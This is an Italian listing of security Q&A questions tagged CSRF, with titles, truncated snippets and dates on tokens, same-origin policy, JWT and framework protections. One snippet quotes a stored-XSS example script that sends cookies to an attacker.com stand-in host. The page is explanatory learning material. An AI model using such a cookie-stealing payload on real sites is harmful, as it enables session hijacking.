Domande con tag 'csrf'

domande con tag
2
risposte

ViewState ASP.NET impedisce implicitamente gli attacchi CSRF? Cosa significa questo per MVC?

Se un ASP.NET Viewstate crittografato viene inviato con ogni modulo e controlla POST, significa che ASP.NET è meno vulnerabile a CSRF rispetto ad altre soluzioni con questo? Qual è l'estensione e la limitazione di tale protezione? Dato che...
posta 08.11.2011 - 08:23
1
risposta

In che modo le richieste Ajax sono vulnerabili agli attacchi CSRF se viene applicata la politica Stesso origine?

Quello che so su CSRF è che un sito Web malintenzionato induce un utente normale a inviare una richiesta a un sito Web attendibile utilizzando un modulo. Capisco che sia possibile perché possiamo pubblicare moduli su domini diversi. Tuttavia,...
posta 26.05.2014 - 16:46
2
risposte

Perché i browser consentono ai siti Web pubblici di attaccare i siti intranet?

Quando visito un sito Web su Internet pubblico, il sito Web può far sì che il mio browser invii richieste a un indirizzo IP locale (come 10.0.0.1). Questo può essere usato per attaccare siti web interni, ad esempio attraverso Attacchi CSRF. P...
posta 07.04.2013 - 09:29
5
risposte

Protezione CSRF con ID sessione

Per proteggere contro CSRF, non è possibile che il mio javascript della pagina inserisca dinamicamente l'ID di sessione dal cookie nel corpo di ogni richiesta HTTP appena prima che venga inviato? Il server dovrebbe quindi semplicemente conval...
posta 14.05.2013 - 10:28
2
risposte

Perché i cookie sono considerati più sicuri contro XSS?

Questo articolo discute la memorizzazione dei token di sessione in un cookie vs in localStorage: link L'articolo afferma: Cookies, when used with the HttpOnly cookie flag, are not accessible through JavaScript, and are immune to XSS....
posta 09.03.2016 - 10:21
3
risposte

Ho bisogno del token CSRF se sto usando Bearer JWT?

Contesto : il sito angolare è ospitato su S3 dietro CloudFront, separato dal server Express utilizzato come API e quasi tutte le richieste sono XMLHttpRequests. Tutte le richieste vengono inviate senza cookie (con Credentials = false di default...
posta 29.09.2017 - 14:25
3
risposte

cookie CSRF vs token basati su sessione

Genererò un token CSRF e lo includerò in un campo modulo nascosto. Quando ricevo la richiesta, verificherò il valore del modulo rispetto al valore memorizzato nella sessione dell'utente o in un cookie. È ancora accettabile dal punto di vista...
posta 23.08.2012 - 16:16
1
risposta

Perché non puoi rubare il token del sincronizzatore per fare CSRF? [duplicare]

Sto leggendo su CSRF e ho trovato i token di sincronizzazione. Non capisco perché non puoi fare un CSRF per ottenere il token per fare un vero CSRF. Esempio: bank.com ha una forma come questa in https://bank.com/transfer : <fo...
posta 26.07.2015 - 20:10
2
risposte

Tipo 2 XSS vs CSRF

Cercando di creare una conoscenza approfondita di XSS e CSRF, sono chiaro che un xx di tipo 2 implica un exploit persistente sul server. es. <SCRIPT type="text/javascript"> new Image().src = 'http://www.attacker.com/evil.php?cookie='...
posta 12.05.2013 - 09:10
2
risposte

La protezione CSRF incorporata di Django è sufficiente?

Django imposta un token di protezione CSRF sulla macchina dell'utente tramite un cookie. Richiede quindi il token sulle richieste POST. Se questi due non corrispondono, restituisce un 403. Se cambio manualmente sia il cookie che il valore del...
posta 17.12.2013 - 20:49